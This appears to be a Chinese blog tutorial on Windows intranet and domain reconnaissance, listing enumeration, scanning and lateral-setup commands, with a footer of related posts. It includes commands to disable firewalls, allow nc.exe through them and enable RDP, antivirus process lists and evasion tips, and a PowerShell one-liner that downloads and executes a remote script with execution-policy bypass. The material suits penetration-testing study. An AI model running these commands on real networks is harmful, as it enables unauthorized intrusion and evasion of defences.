内网安全学习从入门到入狱-知识-内网信息探测与收集
内网安全学习从入门到入狱-知识-内网信息收集
内网信息收集-工作组和域内基本信息收集
- 内网安全学习从入门到入狱-知识-内网信息收集
- 0x01本机检查--先看看我是谁
- 查询并开启远程连接服务
- 0x02域内信息收集
- 查询当前额权限
- 判断是否有域
- 查找域控
- 获取域内的用户信息
- 0x03 域内网存活主机的探测
- 主机存活扫描
- 域内端口扫描
- PowerSploit 中的 Invoke-Portscan.ps1 脚本
- 前提准备
本文中PowerShell脚本可以自行下载
https://github.com/PowerShellMafia/PowerSploit
0x01本机检查–先看看我是谁
域内的主机一般都是批量的,所以我们看看我们自己,基本上大家也就是差不多的情况
先看看ip,看看网卡,内外网情况,IP段记录一下,DNS
ipconfig /all
查看用户列表
net user
查看在线的用户
query user || qwinsta
查看本机管理员
net localgroup administrators
看管理员进程
tasklist /v
域管理进程 hack\adminishtartor
还有一些常见杀软
360sd…EXE | 360 |
---|---|
360tray.EXE | 360 |
ZHUDONGFANGYU.EXE | 360 |
KSAFETRAY.EXE | 金山 |
MACAFEE MCSHIELD.EXE | MacAfee |
AVP.EXE | K卡巴斯基 |
AVGGUARD.EXE | 小红伞 |
EGUI.EXE | Nod32 |
- 查看进程 too
wmic process list brief
- 查看端口
netstat -ano
systeminfo 或者 wmic qfe get Caption,Description,HotFixID,InstalledOn
查看共享列表
net share wmic share get name,path,status
(1)关闭防火墙
Windows Server 2003 系统及之前版本
netsh firewall set opmode disable
Windows Server 2003 之后系统版本,命令如下。
netsh advfirewall set allprofiles state off
- 修改防火墙配置
Windows Server 2003 系统及之前版本,允许指定程序全部连接,命令如下。
netsh firewall add allowedprogram c:\nc.exe “allow nc” enable
Windows Server 2003 之后系统版本,情况如下。
允许指定程序连入,命令如下。
netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C: \nc.exe"
允许指定程序连出,命令如下。
netsh advfirewall firewall add rule name="Allow nc" dir=out action=allow program="C: \nc.exe"
允许 3389 端口放行,命令如下。
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
查询并开启远程连接服务
查看远程连接端口
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber
在 Windows Server 2003 中开启 3389 端口
wmic path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1
在 Windows Server 2008 和 Windows Server 2012 中开启 3389 端口
一般前两个命令就开启了
wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName='RDP-Tcp') call setuserauthenticationrequired 1reg add "HKLM\SYSTEM\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
查询域控制器列表
Net group "Domain Controller" /domain
收集管理员列表
Net group "Domain admins" /domain
- 列出或断开本地计算机和连接的客户端的会话
net session
0x02域内信息收集
查询当前额权限
- 获取域 SID
whoami /all
- 查询指定账户的详细信息。
net user XXX /domain
判断是否有域
主要利用
ifconfig /all
systeminfo
net view /domain 查询域
net view /domain:XXX 查询此域内所有计算机
net group /domain 查询域内所有用户
net config workstation
net time /domain
net group "domain computers" /domain 查询所有域成员计算机net accounts /domain 获取域密码信息
这个在大型内网,多个域很重要
获取域信任信息nltest /domain_trusts
查找域控
可以看到域控制器机器名
nltest /DCLIST:hack
查看域控制器的主机
Nslookup -type=SRV _ldap._tcp
获取域内的用户信息
获取域内用户信息
net user /domain
查看存在用户
dsquery user
0x03 域内网存活主机的探测
主机存活扫描
内网探测要点
- 避免使用大流量攻击的软件和图形化的东西
- 避免杀软敏感操作
- 尽量使用系统自带的组件
- 上班和下班多次扫描,可以进行对比网络情况
1.利用netbios快速探测内网
Netbios.exe 192.168.0.1/24
2.利用 ICMP 协议快速探测内网----ping命令主要使用—有的ping不通很正常
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL="
3.通过 ARP 扫描探测内网
arp-scan 工具
Arp.exe –t 192.168.1.0/20 Nishang 中的 Invoke-ARPScan.ps1扫描
powershell.exe -exec bypass -Command "& {Import-Module C:\windows\temp\Invoke-ARPScan.ps1; Invoke-ARPScan -CIDR 192.168.1.0/24}" >> C:\windows\temp\log.txtEmpire 中的 arpsan 模块
usemodule situational_awareness/network/arpscan
set Range 192.168.1.0-192.168.0.254
execute
4.利用TCP UDP工具扫描
ScanLine 是一款经典的端口扫描工具 体积小,动静小
scanline -h -t 22,80-89,110,389,445,3389,1099,1433,2049,6379,7001,8080,1521,3306,3389,5432 -u 53,161,137,139 -O c:\windows\temp\log.txt -p 192.168.1.1-254 /b
域内端口扫描
建议 wmi和powershell工具 动静小好
S扫描器
Metasploit 包含多种端口扫描技术,与其他扫描工具接口良好。在 msfconsole 下运行“search portscan”命令,即可进行搜索。
PowerSploit 中的 Invoke-Portscan.ps1 脚本
这个强大之处在于是无文件落地的扫描,很强大,
可以绕过一些杀软
主要机子要联网能连接到 GitHub这个地址
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.1.0/24 -T 4 -ports '445,1433,8080,3389,80' -oA c:\windows\temp\res.txt"
内网安全学习从入门到入狱-知识-内网信息探测与收集相关推荐
- 内网安全学习从入门到入狱-知识-内网基础知识
内网安全学习从入门到入狱-知识-内网基础知识 文章目录 内网安全学习从入门到入狱-知识-内网基础知识 内网渗透基础 基本的名词介绍 工作组 域 活动目录(AD) DC 域控制器(DC) DNS域名服务 ...
- 内网安全学习从入门到入狱-知识-内网隧道技术小结
文章目录 0x00 内网穿透技术 0x01 首先判断出网协议 0x02 各种协议隧道 网络层 ICMP隧道 Lcx 传输层 瑞士军刀:nc Powercat(powershell版的nc) 推荐:ne ...
- mysql记录和字段_科学网—MySQL学习笔记:计算同一条记录内各字段之和,并判断是否归一 - 丁祥欢的博文...
★计算同一记录中不同字段之和 背景说明:MainDB表内有几十个字段用于存放配方数据,需要将它们加起来看看是否归一. 由于MySQL没有类似高版本Access那样的计算字段,因为需要用SQL语法来处理 ...
- 【慕课网】人工智能-语音入门|公开课知识整理
人工智能-语音入门 该博客是慕课网视频教程的笔者自我小结,原视频传送门 References: 语音增强理论与实践-[美]罗艾洲等 [译]高毅等 WAV和PCM的关系和区别 AudioSet数据集 知 ...
- python视频教程推荐it教程网_Python视频教程之入门基础篇_IT教程网
资源名称:Python视频教程之入门基础篇 资源目录: [IT教程网]320b96cae58124db5fb6e7c5df99aefc [IT教程网]699434136852f34ec720f2a34 ...
- python(十四)--Django学习快速入门
Django学习快速入门 1. 预备知识 1.1 什么是http协议 1.2 MVC模式和MTV模式 1.2.1 MVC 模式 1.2.2 MTV 模式 2. Django框架介绍 2.1 什么是框架 ...
- Kali学习之从入门到入狱(三)
Kali学习之从入门到入狱 冒个泡 开篇 1 Linux 常见目录 2 Linux基础命令 2.0 环境变量 2.1 apt-get 安装 2.2 ls ll 和 alias 2.3 花式grep 2 ...
- 慕课网《Flutter从入门到进阶》学习笔记二
文章目录 Flutter必备Dart基础:Dart快速入门 学习资料 4-1 Flutter之Dart概述 4-2 Flutter之Dart常用数据类型(数字.类型转换) 4-3 Flutter之Da ...
- 渗透测试入门2之进入内网
渗透测试入门2之进入内网 1. 基于企业弱账号漏洞 VPN(通过邮箱,密码爆破,社工等途径获取VPN) 企业相关运维系统(zabbix等) 2. 基于系统漏洞进入 Metasploit(漏洞利用框架) ...
最新文章
- 如何创建systemd定时任务
- 【iOS_Development】文件操作
- Ubuntu安装Ceres库-安装依赖时报错:E:无法定位软件包 libcxsparse3.1.2_朱国鑫的博客-CSDN博客
- ArrayDeque中的取余
- mingw编译boost_1_66_0
- replication crash safe
- java中的sleep()和wait()的区别
- Linux下RabbitMQ服务器搭建
- mac memcached_Mac OS X上的Java Memcached
- 使用prismjs为网站添加代码高亮功能
- 计算机按应用可分为几类,计算机按性能可以分为哪几类
- 3个平台下的ffmpeg——ffmpeg编译
- 华为5G折叠屏手机Mate X 重新入网,即将上市!
- 深度学习中的数据增强方法
- 这所211怒将自己学生告成老赖:90后校友承诺捐母校1100万未兑现
- 支付产品理解第一篇——使用第三方支付的信息流与资金流
- Spring IOC的工作原理
- python编程字典数据库_python基础数据类型之字典、集合
- C++11 decltype类型推导详解
- python入门与实战-python介绍